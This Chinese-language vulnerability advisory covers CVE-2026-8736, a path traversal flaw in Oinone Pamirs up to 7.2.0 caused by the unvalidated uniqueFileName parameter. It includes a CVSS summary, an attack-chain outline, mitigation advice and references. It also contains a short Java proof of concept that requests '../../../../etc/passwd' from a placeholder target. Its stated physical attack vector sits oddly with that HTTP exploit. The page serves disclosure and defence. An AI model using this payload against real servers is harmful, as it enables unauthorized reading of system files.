CVE-2026-8736 Oinone Pamirs路径遍历漏洞

漏洞信息

漏洞编号

CVE-2026-8736

漏洞类型

路径遍历

CVSS评分

4.1 中危

攻击向量

物理 (AV:P)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Oinone Pamirs

漏洞概述

Oinone Pamirs 7.2.0及之前版本存在安全漏洞。问题出在LocalFileClient.java文件的RestController组件中。由于对request.getParameter获取的uniqueFileName参数处理不当，导致路径遍历漏洞。攻击者需在物理设备上操作，可能导致敏感信息泄露、文件篡改或服务中断。该漏洞利用代码已公开，且厂商尚未对此做出回应，风险需引起重视。

技术细节

该漏洞的核心成因在于 Oinone Pamirs 软件组件 LocalFileClient.java 中的 RestController 部分对用户输入处理不当。具体而言，代码直接调用了 `request.getParameter("uniqueFileName")` 方法来获取用户提供的文件名参数，并将其直接用于文件路径的构建与操作，完全缺失了必要的输入验证与路径合法性检查机制。根据 CVSS 向量分析，攻击向量为物理（AV:P），意味着攻击者需要对物理设备进行本地访问才能发起攻击。攻击者可以通过精心构造包含“../”目录跳转序列的恶意字符串作为 `uniqueFileName` 参数的值。当服务器端处理该请求时，未经过滤的路径将被解析，从而允许攻击者绕过应用程序预设的根目录限制，访问服务器文件系统上的任意文件。这可能导致敏感配置信息泄露、源代码读取甚至系统关键文件被篡改。尽管该漏洞的机密性、完整性和可用性影响评分均为低，但由于利用代码已公开且厂商尚未响应，对于物理环境安全要求较高的场景仍构成潜在威胁。

攻击链分析

STEP 1

物理接触

攻击者获取对运行 Oinone Pamirs 设备的物理访问权限。

STEP 2

识别接口

定位到 LocalFileClient.java 中 RestController 组件暴露的文件处理接口。

STEP 3

构造Payload

构造包含路径遍历字符（如 ../）的恶意字符串，作为 uniqueFileName 参数的值。

STEP 4

发送请求

向目标接口发送包含恶意参数的 HTTP 请求。

STEP 5

执行攻击

服务器端未过滤参数，直接读取并返回非预期路径下的文件内容。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import java.io.*;
import java.net.*;

/**
 * PoC for CVE-2026-8736
 * Demonstrates path traversal via uniqueFileName parameter.
 */
public class Exploit {
    public static void main(String[] args) {
        try {
            // Target URL hosting the vulnerable RestController
            String target = "http://target:port/api/file";
            
            // Malicious payload using path traversal sequences
            String payload = "../../../../etc/passwd";
            
            // Construct the malicious request URL
            String exploitUrl = target + "?uniqueFileName=" + URLEncoder.encode(payload, "UTF-8");
            
            System.out.println("[+] Sending exploit request to: " + exploitUrl);
            
            // Send request (Simulation)
            URL url = new URL(exploitUrl);
            HttpURLConnection conn = (HttpURLConnection) url.openConnection();
            conn.setRequestMethod("GET");
            
            // Read response
            BufferedReader in = new BufferedReader(new InputStreamReader(conn.getInputStream()));
            String inputLine;
            StringBuilder response = new StringBuilder();
            
            while ((inputLine = in.readLine()) != null) {
                response.append(inputLine);
            }
            in.close();
            
            System.out.println("[+] Response received:");
            System.out.println(response.toString());
            
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

影响范围

Oinone Pamirs <= 7.2.0

防御指南

临时缓解措施

在厂商发布补丁前，应严格限制对物理设备的访问权限，仅允许授权人员操作。建议在网络层或应用层部署访问控制策略，监控并拦截包含路径遍历特征的异常请求。对于非必要的文件操作功能，可考虑临时禁用以降低风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8736
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8736
3 Details https://www.cvedetails.com/cve/CVE-2026-8736/
4 VulDB https://vuldb.com/cve/CVE-2026-8736
5 Link https://github.com/SourByte05/SourByte-Lab/issues/14
6 Link https://vuldb.com/submit/809889
7 Link https://vuldb.com/vuln/364324
8 Link https://vuldb.com/vuln/364324/cti